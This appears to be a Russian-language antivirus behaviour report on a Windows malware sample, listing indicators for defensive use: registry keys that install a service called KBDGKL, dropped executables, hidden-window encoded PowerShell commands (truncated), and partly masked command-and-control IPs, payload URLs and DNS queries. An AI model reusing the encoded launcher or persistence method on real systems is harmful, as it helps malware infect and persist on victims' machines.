Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\KBDGKL] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\KBDGKL] 'ImagePath' = '"%WINDIR%\SysWOW64\mscories\KBDGKL.exe"'
- 'KBDGKL' "%WINDIR%\SysWOW64\mscories\KBDGKL.exe"
- 'KBDGKL' %WINDIR%\SysWOW64\mscories\KBDGKL.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB5AG8AdQB0AHMAbwBpAHYAPQAnAHkAbwBvAHQAYwBoAGUAdABkAHUAdQB5AHkAbwB1AHgAawBlAGEAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAUgBpAGAAVAB5AF...
- %HOMEPATH%\332.exe
- %HOMEPATH%\332.exe
- %HOMEPATH%\332.exe в %WINDIR%\syswow64\mscories\kbdgkl.exe
- %HOMEPATH%\332.exe
- '94.##.254.194':80
- '21#.#1.142.238':8080
- http://ph###huan.com/wp-admin/h/
- http://rm####etstore.com/cwu/l6y/
- http://fi#####rcleanerstx.com/h/procurement/9uvmim/
- http://21#.##.142.238:8080/oClhkRt/6x5ydY9jkEJqu86gm/ via 21#.#1.142.238
- DNS ASK ki###ani.com
- DNS ASK ph###huan.com
- DNS ASK rm####etstore.com
- DNS ASK fi#####rcleanerstx.com
- DNS ASK th####rarysamui.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB5AG8AdQB0AHMAbwBpAHYAPQAnAHkAbwBvAHQAYwBoAGUAdABkAHUAdQB5AHkAbwB1AHgAawBlAGEAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAUgBpAGAAVAB5AF...' (со скрытым окном)